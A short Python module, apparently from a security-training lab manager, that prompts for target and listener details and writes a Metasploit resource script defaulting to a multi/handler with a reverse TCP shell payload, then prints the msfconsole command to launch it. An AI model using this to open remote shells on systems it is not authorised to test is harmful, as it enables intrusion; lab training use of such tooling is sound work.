from pathlib import Path

NAME = "MSF Resource Script"
DESCRIPTION = "Generate a Metasploit .rc automation script for lab use."
ALLOWED_ROLES = ["admin", "instructor"]

REPORT_DIR = Path("tools/red/reports")


def run(username, role):
    print("[!] LAB USE ONLY — authorized targets only.")
    rhost = input("Target IP (RHOSTS): ").strip()
    lhost = input("Listener IP (LHOST): ").strip()
    lport = input("Listener port (default 4444): ").strip() or "4444"
    if not rhost or not lhost:
        return

    module = input("Module (default exploit/multi/handler): ").strip()
    module = module or "exploit/multi/handler"
    payload = input("Payload (default generic/shell_reverse_tcp): ").strip()
    payload = payload or "generic/shell_reverse_tcp"

    script = f"""# Generated by CyberLab-Manager
use {module}
set RHOSTS {rhost}
set LHOST {lhost}
set LPORT {lport}
set PAYLOAD {payload}
set ExitOnSession false
exploit -j
"""

    REPORT_DIR.mkdir(parents=True, exist_ok=True)
    out = REPORT_DIR / "lab_exercise.rc"
    out.write_text(script, encoding="utf-8")

    print(f"\n[+] Resource script written to {out}")
    print(f"[*] Run with: msfconsole -r {out}")
